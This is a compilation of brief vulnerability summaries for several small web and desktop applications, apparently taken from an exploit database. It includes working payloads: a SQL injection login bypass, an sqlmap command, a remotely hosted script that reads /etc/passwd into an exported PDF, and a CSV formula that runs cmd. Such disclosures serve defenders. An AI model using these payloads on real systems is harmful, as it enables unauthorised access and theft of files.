EgavilanMedia User Registration & Login System with Admin Panel 1.0 is vulnerable to Stored Cross Site Scripting. An attacker can inject malicious JavaScript code in the Full Name parameter of the registration page. The malicious code will be stored in the database and will be executed when the Admin Panel is accessed.
An SQL injection vulnerability was discovered in the PHP Student Result Management System. The Admin Login Portal is vulnerable to SQL Injection, which could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection.
Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. An attacker can update any user's account. (Note: FULL NAME field is also vulnerable to stored XSS & attacker can steal the authenticated Session os the user)
SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data. An attacker can gain admin panel access using malicious sql injection queries. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/Under%20Construction/admin/login.php 2. Now put below Payload in both the fields( User ID & Password) Payload: admin' or '1'='1 3. Server accepted our payload and we bypassed cpanel without any credentials.
This exploit allows an attacker to inject malicious SQL code into the 'id' parameter of the Pharmacy Store Management System 1.0. This can be done by using the SQLMAP tool, which can be used to identify databases and tables in the system. The command to use is 'sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch'
We can create portfolios, export them to PDF and download them. The issue is that there is an HTML Injection, and if we inject HTML into the portfolio, when it is exported to PDF, it will be rendered. So we can take advantage that it is running under the wrapper file:// to inject an XMLHttpRequest requesting the local file we want, that when downloading the PDF, we can see the content of that file. We cannot inject the XMLHttpRequest directly into the content of the portfolio, as there is something blocking it. So we will have to host a script in our own server and invoke it from the portfolio. We insert this in the portfolio: <script src=host.com/test.js> </script> Script in our server: x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); So, finally, we will only have to download the PDF and there, will be the content of the file we have requested.
This exploit allows an attacker to cause a denial of service (DoS) by creating a new .txt file with a buffer of 'Z' characters of length 10000 and then copying the content of the file into the Subject title field of the program aSc Timetables 2021.6.2.
Expense Management System is vulnerable to Stored Cross Site Scripting. An attacker can inject malicious JavaScript code into the 'description' parameter of the 'expense_action.php' page. When a victim visits the page, the malicious code will be executed in the victim's browser.
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in Contact Us feature in Tendenci v12.3.1 via message field that is mistreated while exporting to a CSV file. To exploit this vulnerability: 1. Go to contact us page and enter the payload '=10+20+cmd|' /C calc'!A0' in the message field and submit the form 2. Login to the application and go to Forms section and export the contact us form entries 3. Click on Export and save the CSV file downloaded 4. Open the CSV file, allow all popups and our payload is executed (calculator is opened).
An attacker with low privileges can download a malicious executable file to the Intel directory and set it to run with the unquoted service path of the Intel User Notification Service. After the system is rebooted, the malicious executable will be executed with SYSTEM privileges.
Services By CQR